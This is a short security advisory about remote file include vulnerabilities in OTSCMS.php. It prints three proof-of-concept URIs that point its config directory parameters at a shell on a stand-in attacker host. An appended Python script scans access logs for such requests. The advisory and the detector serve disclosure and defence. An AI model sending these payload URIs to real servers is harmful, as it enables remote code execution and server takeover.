OTSCMS OTSCMS.PHP Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs demonstrate these vulnerabilities:

http://www.example.com/[path]/OTSCMS.php?GLOBALS[config][directories][classes]=http://evilsite.com/shell?
http://www.example.com/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][classes]=http://evilsite.com/shell?
http://www.example.com/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][includes]=http://evilsite.com/shell?
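
A defender's view of the URIs above, as an added example that is not part of the original advisory: a Python check over web-server access logs that flags requests whose query string sets a `GLOBALS[...]` parameter to a remote or stream-wrapper URL. The log lines, client addresses, the `command`, `page` and `ref` parameters and the `remote.example` host are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# "METHOD URI PROTOCOL" inside a combined-format access log entry
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter names that address PHP's GLOBALS array, as in the advisory's URIs
GLOBALS_KEY_RE = re.compile(r"^GLOBALS\[", re.IGNORECASE)
# Values that would point an include path at a remote or stream-wrapper source
REMOTE_VALUE_RE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect):", re.IGNORECASE)

# Constructed sample log lines (not taken from a real server)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /cms/OTSCMS.php'
    '?GLOBALS[config][directories][classes]=http://remote.example/x? HTTP/1.1" 200 512',
    # Same kind of request with brackets and URL percent-encoded and mixed case
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /cms/OTSCMS.php'
    '?GLOBALS%5Bconfig%5D%5Botscms%5D%5Bdirectories%5D%5Bincludes%5D'
    '=hTTp%3A%2F%2Fremote.example%2Fx%3F HTTP/1.1" 200 512',
    # Ordinary requests: no GLOBALS[...] key, so a URL value alone is not flagged
    '198.51.100.7 - - [01/Jan/2010:10:01:00 +0000] "GET /cms/OTSCMS.php'
    '?command=news&page=2 HTTP/1.1" 200 2048',
    '198.51.100.8 - - [01/Jan/2010:10:02:00 +0000] "GET /cms/OTSCMS.php'
    '?ref=http://www.example.com/ HTTP/1.1" 200 2048',
]

def suspicious_params(uri):
    """Return (name, value) pairs that set GLOBALS[...] to a remote location."""
    query = uri.partition("?")[2]
    # parse_qsl percent-decodes names and values, so %5B / %5D are normalised
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if GLOBALS_KEY_RE.match(name) and REMOTE_VALUE_RE.match(value)]

def scan_log(lines):
    """Return (client, name, value) for every suspicious parameter in the log."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a recognisable request line
        client = line.split(" ", 1)[0]
        for name, value in suspicious_params(match.group(1)):
            findings.append((client, name, value))
    return findings

if __name__ == "__main__":
    for client, name, value in scan_log(SAMPLE_LOG):
        print(f"{client} set {name} to {value!r}")
```

The check only sees what the access log records, so parameters sent in a POST body and double-encoded values are outside its reach.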


 

Copyright 2010, SecurityFocus